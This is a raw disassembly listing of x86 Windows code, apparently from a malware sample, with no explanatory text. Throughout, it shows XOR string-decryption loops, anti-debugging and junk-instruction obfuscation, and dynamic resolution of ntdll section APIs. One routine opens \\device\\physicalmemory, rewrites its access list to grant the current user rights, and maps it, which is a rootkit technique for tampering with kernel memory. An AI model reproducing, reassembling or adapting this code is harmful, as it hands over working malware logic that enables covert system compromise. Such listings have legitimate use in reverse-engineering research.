jmp short loc_401B01
; ---------------------------------------------------------------------------
loc_401AFB: ; CODE XREF: sub_401A7E+73�j
lea eax, [ebp+var_8]
mov [ebp-10h], eax
loc_401B01: ; CODE XREF: sub_401A7E+7B�j
push dword ptr [ebp-10h] ; lpNumberOfBytesRead
push esi ; nNumberOfBytesToRead
push ebx ; lpBuffer
push edi ; hFile
call ReadFile ; ReadFile
mov eax, dword_43C292
mov [ebp+var_C], eax
push edi ; hObject
call CloseHandle ; CloseHandle
mov eax, ebx
loc_401B1C: ; CODE XREF: sub_401A7E+4F�j
pop edi
pop esi
pop ebx
leave
retn
sub_401A7E endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov esi, [ebp+0Ch]
push esi
push dword ptr [ebp+8]
mov eax, dword_43C2A0
lea eax, ds:410820h[eax]
push eax
call memcpy ; memcpy
add esp, 0Ch
xor edi, edi
jmp short loc_401B5E
; ---------------------------------------------------------------------------
loc_401B47: ; CODE XREF: .text:00401B60�j
mov eax, dword_43C2A0
add eax, edi
lea eax, ds:410820h[eax]
movsx edx, byte ptr [eax]
xor edx, 5Fh
mov [eax], dl
inc edi
loc_401B5E: ; CODE XREF: .text:00401B45�j
cmp edi, esi
jl short loc_401B47
mov dword ptr [ebp-4], 0D0h
mov eax, dword_43C2A0
add eax, esi
mov byte ptr dword_410820[eax], 0
xor edi, edi
mov edi, dword_43C2A0
add dword_43C2A0, 3
mov eax, dword_43C2A0
inc eax
add eax, esi
mov dword_43C2A0, eax
inc dword_43C2A0
cmp dword_43C2A0, 0E06h
jle short loc_401BAD
and dword_43C2A0, 0
loc_401BAD: ; CODE XREF: .text:00401BA4�j
lea eax, dword_410820[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_401BB7(int, int, void *Dst)
sub_401BB7 proc near ; CODE XREF: sub_4054C8+690�p
; sub_4098A8+FD2�p
var_D = byte ptr -0Dh
var_5 = byte ptr -5
var_4 = word ptr -4
var_2 = word ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
Dst = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
mov ax, word_43C2A4
mov [ebp+var_4], ax
mov [ebp+var_2], 74D3h
movzx eax, [ebp+var_2]
mov edx, eax
add edx, eax
mov eax, edx
mov [ebp+var_2], ax
mov ebx, [ebp+arg_4]
jmp short loc_401C1E
; ---------------------------------------------------------------------------
loc_401BE3: ; CODE XREF: sub_401BB7+6E�j
mov eax, [ebp+arg_0]
cmp byte ptr [eax+ebx], 0Dh
jnz short loc_401C1D
call GetCurrentProcessId ; GetCurrentProcessId
mov eax, [ebp+arg_4]
mov edx, ebx
sub edx, eax
push edx ; Size
mov edx, [ebp+arg_0]
add edx, eax
push edx ; Src
push [ebp+Dst] ; Dst
call memcpy ; memcpy
add esp, 0Ch
mov eax, ebx
sub eax, [ebp+arg_4]
mov edx, [ebp+Dst]
mov byte ptr [edx+eax], 0
mov eax, ebx
add eax, 2
jmp short loc_401C9C
; ---------------------------------------------------------------------------
loc_401C1D: ; CODE XREF: sub_401BB7+33�j
inc ebx
loc_401C1E: ; CODE XREF: sub_401BB7+2A�j
mov eax, [ebp+arg_0]
cmp byte ptr [eax+ebx], 0
jnz short loc_401BE3
cmp [ebp+arg_4], 0
jz short loc_401C5F
mov eax, [ebp+arg_0]
cmp byte ptr [eax+ebx], 0
jnz short loc_401C5F
mov eax, ebx
dec eax
mov edx, [ebp+arg_0]
cmp byte ptr [edx+eax], 0Ah
jnz short loc_401C5F
mov [ebp+var_5], 4
movzx eax, [ebp+var_5]
imul eax, 11ACh
mov [ebp+var_5], al
mov eax, [ebp+Dst]
mov byte ptr [eax], 0
mov eax, [ebp+arg_4]
inc eax
jmp short loc_401C9C
; ---------------------------------------------------------------------------
loc_401C5F: ; CODE XREF: sub_401BB7+74�j
; sub_401BB7+7D�j ...
mov eax, [ebp+arg_0]
add eax, [ebp+arg_4]
push eax ; lpString
call lstrlenA ; lstrlenA
mov ebx, eax
or ebx, ebx
jz short loc_401C9A
mov [ebp+var_5], 2
add [ebp+var_5], 1
mov eax, [ebp+arg_0]
add eax, [ebp+arg_4]
push eax
push [ebp+Dst]
call sub_40C6D8
lea edi, [ebp+var_D]
lea esi, word_43C2A6
movsd
movsd
mov eax, [ebp+arg_4]
add eax, ebx
jmp short loc_401C9C
; ---------------------------------------------------------------------------
loc_401C9A: ; CODE XREF: sub_401BB7+B8�j
xor eax, eax
loc_401C9C: ; CODE XREF: sub_401BB7+64�j
; sub_401BB7+A6�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_401BB7 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov esi, [ebp+0Ch]
push esi
push dword ptr [ebp+8]
mov eax, dword_43C2B8
lea eax, ds:437350h[eax]
push eax
call memcpy ; memcpy
add esp, 0Ch
mov dword ptr [ebp-4], 319h
xor edi, edi
jmp short loc_401CE8
; ---------------------------------------------------------------------------
loc_401CCE: ; CODE XREF: .text:00401CEA�j
mov eax, dword_43C2B8
add eax, edi
lea eax, ds:437350h[eax]
movsx edx, byte ptr [eax]
xor edx, 0F1h
mov [eax], dl
inc edi
loc_401CE8: ; CODE XREF: .text:00401CCC�j
cmp edi, esi
jl short loc_401CCE
mov eax, dword_43C2B8
add eax, esi
mov byte ptr dword_437350[eax], 0
mov edi, dword_43C2B8
mov eax, edi
add eax, 4
add eax, esi
mov dword_43C2B8, eax
add dword_43C2B8, 2
cmp dword_43C2B8, 0DB0h
jle short loc_401D27
and dword_43C2B8, 0
loc_401D27: ; CODE XREF: .text:00401D1E�j
lea eax, dword_437350[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401D31 proc near ; CODE XREF: sub_402843+93�p
var_1E = word ptr -1Eh
var_1C = dword ptr -1Ch
var_18 = byte ptr -18h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_12 = word ptr -12h
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 20h
push ebx
push esi
push edi
mov [ebp+var_4], 15C6h
add [ebp+var_4], 325Fh
inc dword_43C230
mov ax, word_43C2BC
mov [ebp+var_A], ax
mov ebx, [ebp+arg_0]
and dword_40E07C, 0
and dword_41E8B8, 0
and dword_41E9D0, 0
and dword_40F1D0, 0
mov dword_41B7A4, 4
mov dword_41507C, 4
loc_401D8B: ; CODE XREF: sub_401D31+122�j
; sub_401D31+14F�j ...
mov eax, ebx
inc ebx
mov al, [eax]
mov byte_415078, al
movzx eax, byte_415078
or eax, eax
jl loc_402002
cmp eax, 0FFh
jg loc_402002
jmp off_43C2CC[eax*4]
; ---------------------------------------------------------------------------
call GetCurrentThreadId ; GetCurrentThreadId
loc_401DBB: ; CODE XREF: sub_401D31+7E�j
; sub_401D31+291�j
; DATA XREF: ...
or byte ptr dword_41E8B8, 40h
jmp loc_402002
; ---------------------------------------------------------------------------
inc dword_43C230
loc_401DCD: ; CODE XREF: sub_401D31+7E�j
; sub_401D31+291�j
; DATA XREF: ...
xor eax, eax
cmp byte ptr [ebx], 20h
setnz al
dec eax
and eax, 4
inc eax
mov [ebp+var_1C], eax
add dword_41E9D0, eax
jmp loc_402002
; ---------------------------------------------------------------------------
loc_401DE8: ; CODE XREF: sub_401D31+7E�j
; sub_401D31+291�j
; DATA XREF: ...
or byte ptr dword_41E8B8, 40h
test byte ptr [ebx], 38h
jnz loc_402002
loc_401DF8: ; CODE XREF: sub_401D31+7E�j
; DATA XREF: .text:0043C2DC�o ...
test byte_415078, 1
jz short loc_401E11
mov eax, dword_41B7A4
add dword_41E9D0, eax
jmp loc_402002
; ---------------------------------------------------------------------------
loc_401E11: ; CODE XREF: sub_401D31+CE�j
inc dword_41E9D0
jmp loc_402002
; ---------------------------------------------------------------------------
loc_401E1C: ; CODE XREF: sub_401D31+7E�j
; sub_401D31+291�j
; DATA XREF: ...
inc dword_41E9D0
jmp loc_402002
; ---------------------------------------------------------------------------
inc dword_43C230
loc_401E2D: ; CODE XREF: sub_401D31+7E�j
; DATA XREF: .text:0043C364�o ...
test byte ptr dword_41E8B8, 10h
jz short loc_401E3D
xor eax, eax
jmp loc_402195
; ---------------------------------------------------------------------------
loc_401E3D: ; CODE XREF: sub_401D31+103�j
call GetProcessHeap ; GetProcessHeap
or byte ptr dword_41E8B8, 10h
mov al, byte_415078
mov byte_40F1DC, al
jmp loc_401D8B
; ---------------------------------------------------------------------------
loc_401E58: ; CODE XREF: sub_401D31+7E�j
; sub_401D31+291�j
; DATA XREF: ...
test byte ptr dword_41E8B8, 4
jz short loc_401E68
xor eax, eax
jmp loc_402195
; ---------------------------------------------------------------------------
loc_401E68: ; CODE XREF: sub_401D31+12E�j
lea edi, [ebp+var_18]
lea esi, word_43C2BE
mov ecx, 3
rep movsw
or byte ptr dword_41E8B8, 4
jmp loc_401D8B
; ---------------------------------------------------------------------------
loc_401E85: ; CODE XREF: sub_401D31+7E�j
; sub_401D31+291�j
; DATA XREF: ...
test byte ptr dword_41E8B8, 8
jz short loc_401E95
xor eax, eax
jmp loc_402195
; ---------------------------------------------------------------------------
loc_401E95: ; CODE XREF: sub_401D31+15B�j
call GetVersion ; GetVersion
or byte ptr dword_41E8B8, 8
mov al, byte_415078
mov byte_41FB00, al
jmp loc_401D8B
; ---------------------------------------------------------------------------
loc_401EB0: ; CODE XREF: sub_401D31+7E�j
; DATA XREF: .text:0043C464�o
test byte ptr dword_41E8B8, 1
jz short loc_401EC0
xor eax, eax
jmp loc_402195
; ---------------------------------------------------------------------------
loc_401EC0: ; CODE XREF: sub_401D31+186�j
or byte ptr dword_41E8B8, 1
mov dword_41B7A4, 2
jmp loc_401D8B
; ---------------------------------------------------------------------------
loc_401ED6: ; CODE XREF: sub_401D31+7E�j
; DATA XREF: .text:0043C468�o
test byte ptr dword_41E8B8, 2
jz short loc_401EE6
xor eax, eax
jmp loc_402195
; ---------------------------------------------------------------------------
loc_401EE6: ; CODE XREF: sub_401D31+1AC�j
mov [ebp+var_12], 2BC6h
sub [ebp+var_12], 1A0Bh
or byte ptr dword_41E8B8, 2
mov dword_41507C, 2
jmp loc_401D8B
; ---------------------------------------------------------------------------
inc dword_43C230
loc_401F0E: ; CODE XREF: sub_401D31+7E�j
; sub_401D31+291�j
; DATA XREF: ...
inc dword_41E9D0
or byte ptr dword_41E8B8, 40h
jmp loc_402002
; ---------------------------------------------------------------------------
loc_401F20: ; CODE XREF: sub_401D31+7E�j
; sub_401D31+291�j
; DATA XREF: ...
mov eax, dword_41B7A4
add dword_41E9D0, eax
or byte ptr dword_41E8B8, 40h
jmp loc_402002
; ---------------------------------------------------------------------------
loc_401F37: ; CODE XREF: sub_401D31+7E�j
; sub_401D31+291�j
; DATA XREF: ...
mov eax, dword_41B7A4
add eax, 2
add dword_41E9D0, eax
jmp loc_402002
; ---------------------------------------------------------------------------
loc_401F4A: ; CODE XREF: sub_401D31+7E�j
; sub_401D31+291�j
; DATA XREF: ...
mov eax, dword_41507C
add dword_40F1D0, eax
jmp loc_402002
; ---------------------------------------------------------------------------
loc_401F5A: ; CODE XREF: sub_401D31+7E�j
; sub_401D31+291�j
; DATA XREF: ...
mov eax, dword_41B7A4
add dword_41E9D0, eax
jmp loc_402002
; ---------------------------------------------------------------------------
inc dword_43C230
loc_401F70: ; CODE XREF: sub_401D31+7E�j
; sub_401D31+291�j
; DATA XREF: ...
add dword_41E9D0, 2
jmp loc_402002
; ---------------------------------------------------------------------------
loc_401F7C: ; CODE XREF: sub_401D31+7E�j
; sub_401D31+291�j
; DATA XREF: ...
add dword_41E9D0, 3
jmp short loc_402002
; ---------------------------------------------------------------------------
loc_401F85: ; CODE XREF: sub_401D31+7E�j
; sub_401D31+291�j
; DATA XREF: ...
xor eax, eax
jmp loc_402195
; ---------------------------------------------------------------------------
loc_401F8C: ; CODE XREF: sub_401D31+7E�j
; DATA XREF: .text:0043C308�o
or byte ptr dword_41E8B8, 20h
mov eax, ebx
inc ebx
mov al, [eax]
mov byte_42FB10, al
movzx eax, byte_42FB10
or eax, eax
jl short loc_401FFB
cmp eax, 0Bh
jg short loc_401FB4
jmp off_43C6CC[eax*4]
; ---------------------------------------------------------------------------
loc_401FB4: ; CODE XREF: sub_401D31+27A�j
cmp eax, 80h
jl short loc_401FFB
cmp eax, 0CFh
jg short loc_401FFB
jmp off_43C4FC[eax*4]
; ---------------------------------------------------------------------------
call GetCurrentProcessId ; GetCurrentProcessId
loc_401FCE: ; CODE XREF: sub_401D31+7E�j
; sub_401D31+27C�j ...
or byte ptr dword_41E8B8, 40h
jmp short loc_402002
; ---------------------------------------------------------------------------
inc dword_43C230
jmp short loc_402002
; ---------------------------------------------------------------------------
loc_401FDF: ; CODE XREF: sub_401D31+7E�j
; sub_401D31+27C�j ...
mov eax, dword_41B7A4
add dword_41E9D0, eax
jmp short loc_402002
; ---------------------------------------------------------------------------
loc_401FEC: ; CODE XREF: sub_401D31+7E�j
; sub_401D31+27C�j ...
inc dword_41E9D0
or byte ptr dword_41E8B8, 40h
jmp short loc_402002
; ---------------------------------------------------------------------------
loc_401FFB: ; CODE XREF: sub_401D31+7E�j
; sub_401D31+275�j ...
xor eax, eax
jmp loc_402195
; ---------------------------------------------------------------------------
loc_402002: ; CODE XREF: sub_401D31+6D�j
; sub_401D31+78�j ...
inc dword_43C230
test byte ptr dword_41E8B8, 40h
jz loc_40210E
lea edi, [ebp+var_1C+2]
lea esi, dword_43C2C4
mov ecx, 3
rep movsw
mov eax, ebx
inc ebx
mov al, [eax]
mov byte_430C2C, al
mov [ebp+var_12], 46D1h
sub [ebp+var_12], 49BDh
movzx eax, byte_430C2C
and eax, 0C0h
mov [ebp+var_13], al
movzx eax, byte_430C2C
and eax, 7
mov [ebp+var_14], al
movzx eax, [ebp+var_13]
cmp eax, 0C0h
jz loc_40210E
call GetProcessHeap ; GetProcessHeap
cmp [ebp+var_13], 40h
jnz short loc_402078
inc dword_40F1D0
loc_402078: ; CODE XREF: sub_401D31+33F�j
mov byte ptr [ebp+var_1C+1], 69h
add byte ptr [ebp+var_1C+1], 1
movzx eax, [ebp+var_13]
cmp eax, 80h
jnz short loc_402096
mov eax, dword_41507C
add dword_40F1D0, eax
loc_402096: ; CODE XREF: sub_401D31+358�j
call GetCurrentProcessId ; GetCurrentProcessId
cmp dword_41507C, 2
jnz short loc_4020C1
mov byte ptr [ebp+var_1C], 71h
add byte ptr [ebp+var_1C], 25h
cmp [ebp+var_13], 0
jnz short loc_40210E
cmp [ebp+var_14], 6
jnz short loc_40210E
add dword_40F1D0, 2
jmp short loc_40210E
; ---------------------------------------------------------------------------
loc_4020C1: ; CODE XREF: sub_401D31+371�j
mov [ebp+var_1E], 61CBh
sub [ebp+var_1E], 7700h
cmp [ebp+var_14], 4
jnz short loc_4020FB
call GetCurrentProcessId ; GetCurrentProcessId
or byte ptr dword_41E8B8, 80h
call GetCurrentThreadId ; GetCurrentThreadId
mov eax, ebx
inc ebx
mov al, [eax]
mov byte_41B7A0, al
movzx eax, byte_41B7A0
and eax, 7
mov [ebp+var_14], al
loc_4020FB: ; CODE XREF: sub_401D31+3A0�j
cmp [ebp+var_14], 5
jnz short loc_40210E
cmp [ebp+var_13], 0
jnz short loc_40210E
add dword_40F1D0, 4
loc_40210E: ; CODE XREF: sub_401D31+2DE�j
; sub_401D31+330�j ...
and dword_40F1D4, 0
jmp short loc_40212F
; ---------------------------------------------------------------------------
loc_402117: ; CODE XREF: sub_401D31+409�j
mov eax, ebx
inc ebx
mov edx, dword_40F1D4
mov al, [eax]
mov byte_415070[edx], al
inc dword_40F1D4
loc_40212F: ; CODE XREF: sub_401D31+3E4�j
mov eax, dword_40F1D0
cmp dword_40F1D4, eax
jb short loc_402117
mov [ebp+var_6], 1644h
sub [ebp+var_6], 0C83h
and dword_40F1D4, 0
jmp short loc_402169
; ---------------------------------------------------------------------------
loc_402151: ; CODE XREF: sub_401D31+443�j
mov eax, ebx
inc ebx
mov edx, dword_40F1D4
mov al, [eax]
mov byte_43A560[edx], al
inc dword_40F1D4
loc_402169: ; CODE XREF: sub_401D31+41E�j
mov eax, dword_41E9D0
cmp dword_40F1D4, eax
jb short loc_402151
mov [ebp+var_8], 2887h
add [ebp+var_8], 1636h
inc dword_43C230
mov eax, ebx
sub eax, [ebp+arg_0]
mov dword_40E07C, eax
xor eax, eax
inc eax
loc_402195: ; CODE XREF: sub_401D31+107�j
; sub_401D31+132�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_401D31 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+0Ch]
mov dword ptr [ebp-4], 1EAh
push esi
push dword ptr [ebp+8]
mov eax, dword_43CF34
lea eax, ds:4186C0h[eax]
push eax
call memcpy ; memcpy
add esp, 0Ch
xor edi, edi
jmp short loc_4021E2
; ---------------------------------------------------------------------------
loc_4021C8: ; CODE XREF: .text:004021E4�j
mov eax, dword_43CF34
add eax, edi
lea eax, ds:4186C0h[eax]
movsx edx, byte ptr [eax]
xor edx, 0D3h
mov [eax], dl
inc edi
loc_4021E2: ; CODE XREF: .text:004021C6�j
cmp edi, esi
jl short loc_4021C8
mov dword ptr [ebp-8], 278h
mov eax, dword_43CF34
add eax, esi
mov byte ptr dword_4186C0[eax], 0
mov edi, dword_43CF34
mov eax, edi
add eax, 6
add eax, esi
mov dword_43CF34, eax
cmp eax, 0DCEh
jle short loc_40221C
and dword_43CF34, 0
loc_40221C: ; CODE XREF: .text:00402213�j
lea eax, dword_4186C0[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402226 proc near ; CODE XREF: sub_402A48+15�p
var_4 = word ptr -4
var_1 = byte ptr -1
push ebp
mov ebp, esp
push ecx
push esi
push edi
mov [ebp+var_1], 0C6h
sub [ebp+var_1], 4Eh
push offset ModuleName ; "ntdll.dll"
call GetModuleHandleA ; GetModuleHandleA
mov edi, eax
mov esi, 3E55h
add esi, 765Dh
push offset ProcName ; "RtlInitUnicodeString"
push edi ; hModule
call GetProcAddress ; GetProcAddress
mov dword_430C24, eax
call GetTickCount ; GetTickCount
push offset aNtunmapviewofs ; "NtUnmapViewOfSection"
push edi ; hModule
call GetProcAddress ; GetProcAddress
mov dword_41D8A0, eax
push offset aNtopensection ; "NtOpenSection"
push edi ; hModule
call GetProcAddress ; GetProcAddress
mov dword_41B7AC, eax
mov esi, 3B63h
sub esi, 2C1Bh
push offset aNtmapviewofsec ; "NtMapViewOfSection"
push edi ; hModule
call GetProcAddress ; GetProcAddress
mov dword_41E8C8, eax
push offset aRtlntstatustod ; "RtlNtStatusToDosError"
push edi ; hModule
call GetProcAddress ; GetProcAddress
mov dword_430C20, eax
mov [ebp+var_4], 23Ah
sub [ebp+var_4], 4D70h
pop edi
pop esi
leave
retn
sub_402226 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4022BB proc near ; CODE XREF: sub_402A48+172�p
ppSecurityDescriptor= dword ptr -78h
var_72 = dword ptr -72h
var_6E = byte ptr -6Eh
var_6D = dword ptr -6Dh
var_69 = byte ptr -69h
pDacl = dword ptr -68h
OldAcl = dword ptr -64h
var_60 = byte ptr -60h
var_56 = word ptr -56h
var_53 = byte ptr -53h
var_52 = word ptr -52h
pListOfExplicitEntries= _EXPLICIT_ACCESS_A ptr -50h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
hObject = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 78h
push ebx
push esi
push edi
call GetProcessHeap ; GetProcessHeap
push offset aDevicePhysical ; "\\device\\physicalmemory"
lea eax, [ebp+var_60]
push eax
call dword_430C24
call GetProcessHeap ; GetProcessHeap
mov [ebp+var_18], 18h
mov ebx, 752Bh
inc ebx
and [ebp+var_14], 0
mov [ebp+var_53], 2Bh
add [ebp+var_53], 1
lea eax, [ebp+var_60]
mov [ebp+var_10], eax
call GetProcessHeap ; GetProcessHeap
mov [ebp+var_C], 40h
mov [ebp+var_56], 683Eh
inc [ebp+var_56]
and [ebp+var_8], 0
lea edi, [ebp+var_69]
lea esi, byte_43CFE6
xor ecx, ecx
inc ecx
rep movsb
and [ebp+var_4], 0
call GetVersion ; GetVersion
and [ebp+var_30], 0
mov eax, dword_43CFE7
mov [ebp+var_6D], eax
and [ebp+var_2C], 0
mov [ebp+var_28], 1
mov [ebp+var_24], 1
call GetProcessHeap ; GetProcessHeap
lea eax, aCurrent_user ; "CURRENT_USER"
mov [ebp+var_20], eax
lea edi, [ebp+var_6E]
lea esi, byte_43CFEB
xor ecx, ecx
inc ecx
rep movsb
mov [ebp+pListOfExplicitEntries.grfAccessPermissions], 2
mov eax, dword_43CFEC
mov [ebp+var_72], eax
mov [ebp+pListOfExplicitEntries.grfAccessMode], 1
mov ebx, 206Fh
mov eax, ebx
add eax, ebx
mov ebx, eax
and [ebp+pListOfExplicitEntries.grfInheritance], 0
lea edi, [ebp+pListOfExplicitEntries.Trustee]
lea esi, [ebp+var_30]
mov ecx, 5
rep movsd
mov [ebp+var_52], 7B38h
movzx eax, [ebp+var_52]
mov edx, eax
add edx, eax
loc_4023A7: ; DATA XREF: sub_4403F5+2F�o
mov eax, edx
mov [ebp+var_52], ax
lea eax, [ebp+var_18]
push eax
push 60000h
lea eax, [ebp+hObject]
push eax
call dword_41B7AC ; ZwOpenSection
call IsDebuggerPresent ; IsDebuggerPresent
lea eax, [ebp+ppSecurityDescriptor]
push eax ; ppSecurityDescriptor
push 0 ; ppSacl
lea eax, [ebp+OldAcl]
push eax ; ppDacl
push 0 ; ppsidGroup
push 0 ; ppsidOwner
push 4 ; SecurityInfo
push 6 ; ObjectType
push [ebp+hObject] ; handle
call GetSecurityInfo ; GetSecurityInfo
call GetCurrentProcessId ; GetCurrentProcessId
lea eax, [ebp+pDacl]
push eax ; NewAcl
push [ebp+OldAcl] ; OldAcl
lea eax, [ebp+pListOfExplicitEntries]
push eax ; pListOfExplicitEntries
mov eax, 0Bh
sub eax, dword_43CF30
push eax ; cCountOfExplicitEntries
call SetEntriesInAclA ; SetEntriesInAclA
call GetTickCount ; GetTickCount
push 0 ; pSacl
push [ebp+pDacl] ; pDacl
push 0 ; psidGroup
push 0 ; psidOwner
push 4 ; SecurityInfo
push 6 ; ObjectType
push [ebp+hObject] ; handle
call SetSecurityInfo ; SetSecurityInfo
call GetCurrentProcessId ; GetCurrentProcessId
push [ebp+hObject] ; hObject
call CloseHandle ; CloseHandle
lea eax, [ebp+var_18]
push eax
push [ebp+pListOfExplicitEntries.grfAccessPermissions]
lea eax, [ebp+hObject]
push eax
call dword_41B7AC ; ZwOpenSection
call GetLastError
mov eax, [ebp+hObject]
pop edi
pop esi
pop ebx
leave
retn
sub_4022BB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402445 proc near ; CODE XREF: sub_402A48+230�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_B = byte ptr -0Bh
var_A = word ptr -0Ah
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h
call GetCurrentThreadId ; GetCurrentThreadId
mov eax, [ebp+arg_4]
mov [ebp+var_10], eax
mov ecx, [ebp+arg_8]
mov [ebp+var_4], ecx
and [ebp+var_8], 0
mov [ebp+var_A], 3ABh
add [ebp+var_A], 6ED8h
xor edx, edx
mov [ebp+var_14], edx
mov [ebp+var_18], eax
mov [ebp+var_B], 23h
add [ebp+var_B], 1
push 4
push 0
push 1
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_18]
push eax
push [ebp+var_4]
push 0
lea eax, [ebp+var_8]
push eax
push 0FFFFFFFFh
push [ebp+arg_0]
call dword_41E8C8 ; ZwMapViewOfSection
call GetLastError
mov eax, [ebp+var_8]
leave
retn
sub_402445 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4024A8 proc near ; CODE XREF: sub_402A48+31A�p
var_2 = word ptr -2
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov ax, word_43CFF0
mov [ebp+var_2], ax
push [ebp+arg_0]
push 0FFFFFFFFh
call dword_41D8A0 ; ZwUnmapViewOfSection
leave
retn
sub_4024A8 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push eax
push esi
push edi
mov esi, [ebp+0Ch]
push esi
push dword ptr [ebp+8]
mov eax, dword_43CFFC
lea eax, ds:412DE0h[eax]
push eax
call memcpy ; memcpy
add esp, 0Ch
xor edi, edi
jmp short loc_402501
; ---------------------------------------------------------------------------
loc_4024EA: ; CODE XREF: .text:00402503�j
mov eax, dword_43CFFC
add eax, edi
lea eax, ds:412DE0h[eax]
movsx edx, byte ptr [eax]
xor edx, 75h
mov [eax], dl
inc edi
loc_402501: ; CODE XREF: .text:004024E8�j
cmp edi, esi
jl short loc_4024EA
mov dword ptr [ebp-4], 2E3h
mov eax, dword_43CFFC
add eax, esi
mov byte ptr dword_412DE0[eax], 0
xor edi, edi
mov edi, dword_43CFFC
inc dword_43CFFC
mov eax, dword_43CFFC
add eax, 5
add eax, esi
mov dword_43CFFC, eax
add dword_43CFFC, 2
cmp dword_43CFFC, 0DF6h
jle short loc_402552
and dword_43CFFC, 0
loc_402552: ; CODE XREF: .text:00402549�j
mov dword ptr [ebp-8], 1Ch
lea eax, dword_412DE0[edi]
pop edi
pop esi
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402563 proc near ; CODE XREF: sub_402843+1F8�p
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_7 = byte ptr -7
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
lea edi, [ebp+var_7]
lea esi, dword_43D0FC
mov ecx, 7
rep movsb
xor ebx, ebx
loc_40257E: ; CODE XREF: sub_402563+2D5�j
call IsDebuggerPresent ; IsDebuggerPresent
mov eax, [ebp+arg_0]
movzx edx, byte ptr [eax+ebx]
cmp edx, 0FFh
jnz short loc_4025C9
movzx edx, byte ptr [ebx+eax+1]
cmp edx, 0FFh
jnz short loc_4025C9
movzx edx, byte ptr [ebx+eax+2]
cmp edx, 0FFh
jnz short loc_4025C9
movzx edx, byte ptr [ebx+eax+3]
cmp edx, 0FFh
jnz short loc_4025C9
movzx eax, byte ptr [ebx+eax+4]
cmp eax, 0FFh
jz loc_40283E
loc_4025C9: ; CODE XREF: sub_402563+2D�j
; sub_402563+3A�j ...
mov eax, [ebp+arg_4]
mov edx, [ebp+arg_8]
lea eax, [eax+edx+5]
mov edx, [ebp+arg_0]
mov dl, [edx+ebx]
mov [eax+ebx], dl
mov [ebp+var_8], 0
loc_4025E0: ; CODE XREF: sub_402563+16C�j
mov eax, [ebp+arg_0]
movzx edx, [ebp+var_8]
imul edx, 0Ch
movzx edx, byte_43D090[edx]
movzx ecx, byte ptr [eax+ebx]
cmp ecx, edx
jnz loc_4026BA
mov ecx, ebx
dec ecx
movzx ecx, byte ptr [eax+ecx]
cmp ecx, edx
jnz loc_4026BA
mov ecx, ebx
sub ecx, 2
movzx ecx, byte ptr [eax+ecx]
cmp ecx, edx
jnz loc_4026BA
mov ecx, ebx
sub ecx, 3
movzx ecx, byte ptr [eax+ecx]
cmp ecx, edx
jnz loc_4026BA
mov edx, ebx
sub edx, 4
movzx eax, byte ptr [eax+edx]
cmp eax, 0E8h
jnz short loc_4026BA
call GetTickCount ; GetTickCount
movzx eax, [ebp+var_8]
imul eax, 0Ch
push lpModuleName[eax] ; lpModuleName
call GetModuleHandleA ; GetModuleHandleA
movzx edi, [ebp+var_8]
imul edi, 0Ch
push lpProcName[edi] ; lpProcName
push eax ; hModule
call GetProcAddress ; GetProcAddress
mov [ebp+var_C], eax
call IsDebuggerPresent ; IsDebuggerPresent
or eax, 0FFFFFFFFh
mov edx, [ebp+arg_4]
mov ecx, [ebp+arg_8]
lea edx, [edx+ecx+5]
add edx, ebx
sub edx, 4
sub eax, edx
add eax, [ebp+var_C]
sub eax, 4
mov [ebp+var_10], eax
call GetCurrentThreadId ; GetCurrentThreadId
mov eax, [ebp+arg_4]
mov edx, [ebp+arg_8]
lea eax, [eax+edx+5]
add eax, ebx
sub eax, 4
mov edx, [ebp+var_10]
mov ds:1[eax], edx
mov ax, word_43D103
mov [ebp+var_12], ax
jmp short loc_4026D4
; ---------------------------------------------------------------------------
loc_4026BA: ; CODE XREF: sub_402563+95�j
; sub_402563+A4�j ...
movzx eax, [ebp+var_8]
imul eax, 0Ch
cmp lpProcName[eax], 0
jz short loc_4026D4
add [ebp+var_8], 1
jmp loc_4025E0
; ---------------------------------------------------------------------------
loc_4026D4: ; CODE XREF: sub_402563+155�j
; sub_402563+166�j
mov eax, [ebp+arg_0]
cmp byte ptr [eax+ebx], 4
jnz short loc_402744
mov edx, ebx
dec edx
cmp byte ptr [eax+edx], 4
jnz short loc_402744
mov edx, ebx
sub edx, 2
cmp byte ptr [eax+edx], 4
jnz short loc_402744
